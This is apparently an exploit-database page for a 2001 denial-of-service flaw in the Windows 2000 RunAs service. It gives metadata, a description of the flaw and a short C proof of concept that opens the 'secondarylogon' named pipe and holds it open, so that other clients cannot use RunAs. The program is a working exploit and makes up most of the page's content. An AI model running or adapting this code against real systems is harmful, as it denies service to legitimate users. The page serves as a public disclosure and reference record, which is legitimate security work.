header-logo
Suggest Exploit
vendor:
Windows 2000
by:
Camisade - Team RADIX
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Windows 2000
Affected Version From: Windows 2000
Affected Version To: Windows 2000
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2001

Windows 2000 RunAs Service Denial of Service Vulnerability

The Windows 2000 RunAs service allows an application or service to be executed as a different user. It is accessed by holding down the shift key and right mouse clicking on an icon, then selecting 'Run as...' from the context menu. When the service is invoked, it creates a named pipe session with the specified server for authentication of credentials. The RunAs service only allows one instance of this session at a time. If a client were to create this pipe on the server without requesting any service, other clients would be unable to connect to this service.

Mitigation:

N/A
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/3291/info

The Windows 2000 RunAs service allows an application or service to be executed as a different user. It is accessed by holding down the shift key and right mouse clicking on an icon, then selecting 'Run as...' from the context menu.

When the service is invoked, it creates a named pipe session with the specified server for authentication of credentials. The RunAs service only allows one instance of this session at a time. If a client were to create this pipe on the server without requesting any service, other clients would be unable to connect to this service. 

// radix1112200103.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.

#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>

#include <stdio.h>
#include <conio.h>

#define SECLOGON_PIPE   _T("\\\\.\\pipe\\secondarylogon")


void main()
{
   HANDLE hPipe;

   hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
   if (hPipe == INVALID_HANDLE_VALUE)
   {
      printf("Unable to open pipe, error %d\n", GetLastError());
      return;
   }

   printf("Connected to pipe.  Press any key to disconnect.\n");
   getche();

   CloseHandle(hPipe);
}

Navigation

Suggest Exploit

Services By CQR